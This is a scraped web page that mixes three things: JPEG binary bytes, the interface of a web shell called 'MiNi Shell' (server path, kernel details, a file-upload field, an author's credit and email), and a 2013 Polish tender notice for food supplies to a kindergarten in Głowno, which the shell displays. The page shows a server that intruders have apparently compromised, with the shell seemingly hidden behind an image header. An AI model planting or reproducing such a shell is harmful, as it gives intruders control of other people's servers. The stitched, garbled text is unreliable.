JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130130/40832-N-2013.html

<p class="kh_header"><b>Głowno: Dostawa artykułów żywnościowych dla Miejskiego Przedszkola Nr 3  przy ul. Skokowskiego 8/10 w Głownie</b><br>
<b>Numer ogłoszenia: 40832 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedszkole Nr 3 , ul. gen. J. Skokowskiego 8/10, 95-015 Głowno, woj. łódzkie, tel. 42 7191445, faks 42 7191445.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://miasto.glowno.pl/mp3/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Miejskiego Przedszkola Nr 3  przy ul. Skokowskiego 8/10 w Głownie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  dostawa artykułów żywnościowych dla Miejskiego Przedszkola Nr 3 w Głownie, w tym

a)	Nabiał:
1	Mleko 2%	             litr	          5000,00
2	Masło ekstra	kg	400,00
3	Śmietana (18%, 350g)*	szt.	1000,00
4	Ser żółty	kg	60,00
5	Twaróg 	kg	200,00
*śmietana 18% może być dostarczana w opakowaniach 400g pod warunkiem dostarczenia w całym okresie zamówienia w przeliczeniu na masę (w kg)takiej samej wagowej ilości artykułu, co dla opakowań 350 gramowych.

b)	Pieczywo 
L.p.	Nazwa artykułu	Jednostka miary	Ilość
1	Bułka paryska min. 0,40kg	szt.	1300,00
2	Chleb krojony min. 0,50kg	szt.	1500,00
3	Chleb sojowy min. 0,50kg	szt.	600,00
4	Rogal min 0,08kg	szt.	2200,00

c)	Mięso, wędliny i drób -
L.p.	Nazwa artykułu	Jednostka miary	Ilość
1	schab 	kg	100,00
2	od szynki 	kg	80,00
3	mielone 	kg	300,00
4	wołowina b/k 	kg	70,00
5	antrykot 	kg	60,00
6	żebra wołowe 	kg	40,00
7	kurczak 	kg	170,00
8	filet z kurczaka 	kg	120,00
9	szynka wieprzowa 	kg	100,00
10	polędwica drobiowa 	kg	50,00
11	kiełbasa wiejska 	kg	80,00
12	kiełbasa szynkowa 	kg	40,00

d)	Warzywa i owoce -
L.p.	Nazwa artykułu	Jednostka miary	Ilość
1	marchew 	kg	600,00
2	pietruszka 	kg	150,00
3	por 	szt.	200,00
4	seler 	kg	80,00
5	cebula 	kg	140,00
6	buraki czerwone 	kg	300,00
7	kapusta 	kg	500,00
8	ogórki 	kg	200,00
9	ziemniaki 	kg	4000,00
10	jabłka 	kg	1000,00
11	gruszki	kg	200,00
12	śliwki 	kg	200,00
13	banany 	kg	200,00
14	mandarynki 	kg	200,00

e)	Artykuły spożywcze suche -
L.p.	Nazwa artykułu	Jednostka miary	Ilość
1	cukier 	kg	1000,00
2	mąka pszenna typ 450 	kg	500,00
3	sól 	kg	200,00
4	Makaron  Spaghetti 0,5 kg *	szt.	100,00
5	Makaron Nitki 0,5 kg*	szt.	100,00
6	Makaron Muszelki 0,5 kg*	szt.	100,00
7	Makaron Świderki 0,5 kg*	szt.	250,00
8	Makaron Kolanko 0,5 kg*	szt.	250,00
9	Makaron Łazanki 0,5 kg*	szt.	100,00
10	herbata 100 g	szt.	150,00
11	smalec 	kg	100,00
12	kasza manna 	kg	50,00
13	kasza jęczmienna 	kg	100,00
14	kasza gryczana 	kg	50,00
15	kakao 100 g 	szt.	100,00
16	kawa zbożowa rozpuszczalna min. 0,20kg 	szt.	100,00
17	groch  0,5 kg	szt.	50,00
18	fasola Jaś 0,5 kg	szt.	50,00
19	barszcz biały 	kg	20,00
20	olej (op.1 litr)	szt.	100,00
21	koncentrat pomidorowy (30% opak. po 250g)	kg	30,00
22	płatki kukurydziane (op. min.0,25 kg)	szt.	120,00
23	płatki śniadaniowe z pszenicy i żyta o smaku czekoladowym, wzbogacone o witaminy  (op. min. 0,25 kg)	szt.	120,00
24	pasztet drobiowy (słoiki po 0,5 kg) 	szt.	40,00
25	filety z miruny 	kg	160,00
26	Majonez 265g (nie mniej niż 375 kcal) 	szt.	20,00
27	ciastka różne 	kg	160,00
28	sok malinowy (op.0,25 litra)	szt.	50,00
29	rosołki drobiowe 	kg	5,00
30	sos do spaghetti  (słoik 350g)	szt.	50,00
31	pieprz 	kg	2,00
32	ziele angielskie 	kg	1,00
33	liście laurowe 	kg	1,00
34	papryka słodka 	kg	1,00
35	budyń 	kg	20,00
36	cukierki różne	kg	100,00
37	batony 	szt.	500,00
38	czekolada 100g (wyrób czekoladowy)	szt.	500,00
39	bułka tarta 	kg	30,00
40	jajka 	szt.	8000,00
41	kwasek cytrynowy 	szt.	50,00
*Makaron o wartości energetycznej nie mniejszej niż na 100g:  344 kcal, białko 13,5g, węglowodany 69,90g, tłuszcze 0,3g

f)	Mrożone artykuły spożywcze 
L.p.	Nazwa artykułu	Jednostka miary	Ilość
1	pierogi z serem 	kg	130,00
2	kalafior 	kg	50,00
3	mieszanka wielowarzywna 	kg	50,00
4	porzeczka czarna 	kg	300,00
5	truskawka 	kg	100,00
6	fasolka szparagowa 	kg	50,00
7	pampuchy 	kg	130,00.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3, 15.10.00.00-9, 03.22.10.00-6, 03.22.23.00-6, 15.33.11.70-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawcy spełniają  niniejszy warunek, jeżeli złożą oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawcy spełniają  niniejszy warunek, jeżeli złożą oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawcy spełniają  niniejszy warunek, jeżeli złożą oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawcy spełniają  niniejszy warunek, jeżeli złożą oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawcy spełniają  niniejszy warunek, jeżeli złożą oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z treścią art. 144 ust. 1 ustawy - Zamawiający  dopuszcza następujące zmiany postanowień zawartej umowy w zakresie:terminu wykonania i odbioru zamówienia - w przypadku, gdy konieczność takiej zmiany wynikać będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy mimo zachowania należytej staranności, działania siły wyższej bądź umową była by umową o świadczenia niemożliwe (art. 387 § 1 kodeksu cywilnego), zamiany ilości poszczególnego asortymentu artykułów w ramach ceny umownej, zmniejszenia zakresu zamówienia (zamówienia mniejszej ilości towaru), nowe wynagrodzenie wykonawcy zostanie obliczone na podstawie oferty wykonawcy z uwzględnieniem cen z formularza wyceny. zmiany wynagrodzenia w związku ze zmianą stawki podatku od towarów i usług (VAT) w przypadku zmiany przez ustawodawcę stawki tego podatku w trakcie trwania umowy, w przypadku wykonywania zamówienia przy udziale Podwykonawców - zmiany Podwykonawców którzy realizować będą  zamówienie, likwidacji, reorganizacji lub zmiany formy prawnej podmiotu gospodarczego Wykonawcy w sytuacji gdy nowy podmiot przyjmuje prawa i obowiązku podmiotu poprzedniego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://miasto.glowno.pl/mp3/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedszkole Nr 3 w Głownie
ul. Skokowskiego 8/10 ; 95-015 Głowno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2013 godzina 15:30, miejsce: Miejskie Przedszkole Nr 3 w Głownie
ul. Skokowskiego 8/10 ; 95-015 Głowno
kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
PRIORYTET IX ROZWÓJ WYKSZTAŁCENIA I KOMPETENCJI W REGIONACH
9.1 WYRÓWNYWANIE SZANS EDUKACYJNYCH I ZAPEWNIENIE WYSOKIEJ JAKOŚCI USŁUG
EDUKACYJNYCH ŚWIADCZONYCH W SYSTEMIE OŚWIATY
Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej

Przedszkolaki z Trójki !.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com